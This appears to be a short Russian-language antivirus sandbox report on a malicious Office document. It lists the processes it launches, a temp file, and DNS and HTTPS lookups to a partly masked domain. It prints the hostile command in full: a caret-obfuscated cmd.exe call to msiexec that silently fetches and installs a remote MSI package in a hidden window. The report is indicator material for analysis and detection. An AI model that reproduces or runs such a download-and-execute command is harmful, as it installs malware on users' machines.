Техническая информация
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i https://www.cu####eroues.com/mpa/2.msi /qn
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{ac55efa6-4202-442a-a779-57a54f707232}.tmp
- 'cu####eroues.com':443
- DNS ASK cu####eroues.com
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i https://www.cu####eroues.com/mpa/2.msi /qn' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\msiexec.exe' /i https://www.cu####eroues.com/mpa/2.msi /qn
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding